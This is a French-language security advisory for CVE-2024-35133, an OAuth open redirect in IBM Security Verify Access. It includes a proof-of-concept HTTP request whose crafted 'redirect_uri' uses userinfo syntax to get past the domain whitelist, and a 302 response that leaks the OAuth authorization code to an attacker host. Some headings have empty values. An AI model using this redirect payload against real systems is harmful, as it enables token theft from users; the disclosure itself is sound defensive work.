
Bulletin de sécurité pour CVE-2024-35133 - Avec PoC
Révision: 1.0
Impact:
En persuadant une victime de visiter un site web spécialement conçu, un attaquant distant pourrait exploiter cette vulnérabilité pour usurper l'URL affichée et rediriger l'utilisateur vers un site web malveillant. Cela pourrait permettre à l'attaquant d'obtenir des informations hautement sensibles ou de mener d'autres attaques contre la victime.
Sévérité:
Score CVSS:
CVE-ID: CVE-2024-35133
Fournisseur: IBM
Produits concernés:
Versions concernées: 10.0.0 - 10.0.8
IBM Security Verify Access est une solution complète de gestion des politiques de sécurité réseau et d'autorisation. Elle fournit une protection de bout en bout des ressources sur des intranets et extranets géographiquement dispersés.
Parmi les principales fonctionnalités, on trouve :
Lors d'un test d'intrusion du flux OAuth pour un client, une vulnérabilité de redirection ouverte a été découverte, permettant la fuite de la variable « code » d'OAuth.
En contournant la logique de l'analyseur chargé de vérifier le paramètre « redirect_uri » lors d'un flux OAuth (en exploitant la RFC 3986), l'attaquant pouvait manipuler le filtre de liste blanche des domaines dans IBM Security Verify Access. Cela aboutissait à une redirection ouverte vers n'importe quel domaine arbitraire contrôlé par l'attaquant. La victime pouvait être redirigée vers un site malveillant alors que le domaine semblait de confiance.
Cela pourrait conduire à l'exposition d'informations sensibles telles que le jeton « code » d'OAuth ou à d'autres attaques contre la victime.
GET /oauth/oauth20/authorize?response_type=code&client_id=[REDACTED]&state=001710863806728MPUw0xFSj&REDACTED_uri=https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]&scope=openid+ HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
HTTP/1.1 302 Found
content-language: en-US
date: Tue, 19 Mar 2024 16:04:35 GMT
location: https://legitimate.domain:[email protected]/[REDACTED]/openid/REDACTED/[REDACTED]?state=001710863806728MPUw0xFSj&code=7wkH581y0uyS0nm4ff65zCqHn0WC46w7v&iss=[REDACTED]
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-frame-options: DENY
x-content-type-options: nosniff
cache-control: no-store
x-xss-protection: 1; mode=block
x-permitted-cross-domain-policies: none
cross-origin-resource-policy: same-site
content-security-policy: frame-ancestors 'none'
referrer-policy: no-referrer-when-downgrade
strict-transport-security: max-age=31536000; includeSubDomains
pragma: no-cache
Content-Length: 0.
Reportez-vous au Bulletin de sécurité IBM 7166712 pour obtenir des informations sur les correctifs, les mises à niveau ou les solutions de contournement suggérées.
Voir Références pour plus de détails.
Cette vulnérabilité a été découverte et signalée par :
Copyright (c) 2024 Giulio Garzia « Ozozuz »
La redistribution électronique de cette alerte est autorisée. Elle ne peut être modifiée sans le consentement écrit explicite de l'auteur. Pour obtenir l'autorisation de reproduire cette alerte dans d'autres médias, contactez l'auteur.
Avertissement: Les informations contenues dans cet avis sont exactes au moment de la publication, sur la base des données disponibles. Aucune garantie n'est fournie. Ni l'auteur ni l'éditeur n'acceptent de responsabilité pour les dommages directs, indirects ou consécutifs découlant de l'utilisation de ces informations.